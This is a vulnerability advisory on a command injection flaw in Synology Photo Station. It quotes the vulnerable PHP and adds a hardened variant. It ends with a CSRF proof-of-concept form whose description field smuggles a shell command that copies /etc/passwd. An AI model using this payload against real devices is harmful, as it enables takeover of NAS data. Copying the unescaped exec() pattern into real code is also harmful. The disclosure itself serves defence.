Command injection vulnerability in Synology Photo Station

Abstract

A command injection vulnerability was found in Synology Photo Station, which allows an attacker to execute arbitrary commands with the privileges of the webserver. An attacker can use this vulnerability to compromise a Synology DiskStation NAS, including all data stored on the NAS.

Tested version

This issue was tested on Synology Photo Station version 6.2-2858.

Fix

Synology reports that this issue has been resolved in Photo Station version 6.3-2945. https://www.synology.com/en-us/releaseNote/PhotoStation

Introduction

Synology Photo Station is an online photo album that is managed by DiskStation Manager (DSM). Synology NAS provides the home/photo folder for storing photos and videos that can be viewed via a web browser.

A command injection vulnerability was found in Synology Photo Station, which allows an attacker to execute arbitrary commands with the privileges of the webserver (http).

Details

Photo Station calls other Synology applications (e.g., /usr/syno/bin/synophoto_dsm_user) using operating system commands. It was found that Photo Station does not properly sanitize user input; as a result, attackers can inject their own system commands that will be executed by Photo Station. In particular, this issue can be exploited via the description POST parameter. The affected code is listed below:

public static function UpdateDescriptionMetadata($path, $description)
{
	//update metadata
	// $description is inserted into a double-quoted shell string without escaping;
	// only $path is passed through escapeshellarg()
	$cmd = sprintf('%s -M"set %s %s" -M"set %s %s" -M"set %s %s" -M"set %s %s" %s', SYNO_EXIFTOOL_FILE,
		"Xmp.dc.description", $description,
		"Xmp.photoshop.headline", $description,
		"Iptc.Application2.Caption", $description,
		"Exif.Image.ImageDescription", $description, escapeshellarg($path));
	@exec($cmd);
}

As can be observed, this code uses the value of the description parameter to construct an operating system command that is invoked using the PHP exec() function. The user-supplied description is not validated or sanitized, rendering Photo Station vulnerable to command injection.
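As an added illustration (not code from the advisory or from Synology's fix), the following PHP sets the unsafe construction beside a hardened variant that passes each -M argument through escapeshellarg(). The helper functions only build the command string so the two forms can be compared; SYNO_EXIFTOOL_FILE, the file path and the sample caption are assumptions.

```php
<?php
// Added example (not Synology's code or patch): the advisory's command
// construction beside a hardened version. SYNO_EXIFTOOL_FILE is assumed to
// be the metadata tool the vulnerable function invokes (placeholder path).
define('SYNO_EXIFTOOL_FILE', '/usr/bin/exiv2');

// The four metadata tags the original function writes the description to.
const DESCRIPTION_TAGS = [
    'Xmp.dc.description',
    'Xmp.photoshop.headline',
    'Iptc.Application2.Caption',
    'Exif.Image.ImageDescription',
];

// Mirrors the vulnerable code: $description lands inside -M"..." with no
// escaping, so a " in it ends the quoted word and any |, ;, $ or backticks
// that follow are interpreted by /bin/sh.
function buildUnsafeCommand(string $path, string $description): string
{
    $cmd = SYNO_EXIFTOOL_FILE;
    foreach (DESCRIPTION_TAGS as $tag) {
        $cmd .= sprintf(' -M"set %s %s"', $tag, $description);
    }
    return $cmd . ' ' . escapeshellarg($path);
}

// Hardened variant: each -M argument becomes one single-quoted shell word,
// so every metacharacter in $description reaches the tool as literal text.
function buildSafeCommand(string $path, string $description): string
{
    $cmd = escapeshellarg(SYNO_EXIFTOOL_FILE);
    foreach (DESCRIPTION_TAGS as $tag) {
        $cmd .= ' -M' . escapeshellarg("set $tag $description");
    }
    return $cmd . ' ' . escapeshellarg($path);
}

// Replacement for the advisory's function (our suggestion, not the vendor's
// fix). Bypassing the shell with proc_open() + array args (PHP 7.4+) is better.
function UpdateDescriptionMetadata(string $path, string $description): void
{
    @exec(buildSafeCommand($path, $description));
}

// Constructed sample: a caption containing a double quote and a pipe.
// Unsafe: the " ends the -M word, so | is parsed as a pipeline. Safe: both stay literal.
$caption = '5" tall | sunset';
echo "unsafe: " . buildUnsafeCommand('/volume1/photo/a.jpg', $caption) . "\n";
echo "safe:   " . buildSafeCommand('/volume1/photo/a.jpg', $caption) . "\n";
```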

In addition, Photo Station does not protect against Cross-Site Request Forgery (CSRF) attacks. A remote attacker can abuse this and lure a victim into visiting a specially crafted web page to execute arbitrary commands with the privileges of the webserver (http user). As a result, an attacker can compromise the targeted Synology NAS, including all stored data.

Proof of concept

The following proof of concept copies the /etc/passwd file to /var/services/photo/Securify.txt.

<html>
  <body>
    <form action="http://<target>/photo/webapi/photo.php" method="POST">
      <input type="hidden" name="id" value="photo&#95;536168696e&#95;53637265656e2053686f7420323031352d30352d31302061742032322e33342e33352e706e67" />
      <input type="hidden" name="description" value="| cat /etc/passwd &gt; /var/services/photo/Securify.txt " />
      <input type="hidden" name="api" value="SYNO&#46;PhotoStation&#46;Photo" />
      <input type="hidden" name="method" value="edit" />
      <input type="hidden" name="version" value="1" />
      <input type="hidden" name="ps&#95;username" value="admin" />
      <input type="hidden" name="" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
